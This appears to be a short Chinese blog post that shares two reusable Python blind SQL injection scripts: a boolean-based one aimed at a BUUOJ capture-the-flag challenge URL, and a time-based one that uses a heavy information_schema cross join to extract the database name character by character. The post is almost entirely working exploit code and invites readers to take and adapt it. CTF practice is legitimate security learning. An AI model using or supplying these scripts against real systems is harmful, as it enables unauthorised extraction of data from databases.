每次找脚本都花费不少时间,这里存放两个脚本供参考,需要自取修改。
布尔盲注模板:
import requests import time url = 'http://aa3f5cdf-f23b-48b0-97f1-ecac497d9e13.node4.buuoj.cn:81/' flag = "" proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} true = "Hello, glzjin wants a girlfriend." for i in range(1, 1000): left = 32 right = 127 - 1 while left < right: mid = int((left + right + 1) / 2) data = { 'id': f'(select(ascii(mid(flag,{i},1))>={mid})from(flag))' } resp = requests.post(url=url, data=data, proxies=proxies) if true in resp.text: left = mid else: right = mid - 1 time.sleep(0.03) if right != 32: flag += chr(right) print(flag) else: break
时间盲注模板:
import requests import time from datetime import datetime proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} url = '' flag = "" for i in range(1, 1000): left = 32 right = 127 - 1 while left < right: mid = int((left + right + 1) / 2) data = { 'id': f"""1' and ascii(substr(database(),{i},1))>={mid} and (select sum(0) from information_schema.columns A,information_schema.columns B)#""" } start = int(datetime.now().timestamp() * 1000) resp = requests.post(url=url, data=data,proxies=proxies) end = int(datetime.now().timestamp() * 1000) if end - start > 300: left = mid else: right = mid - 1 time.sleep(0.03) if right != 32: flag += chr(right) print(flag) else: break
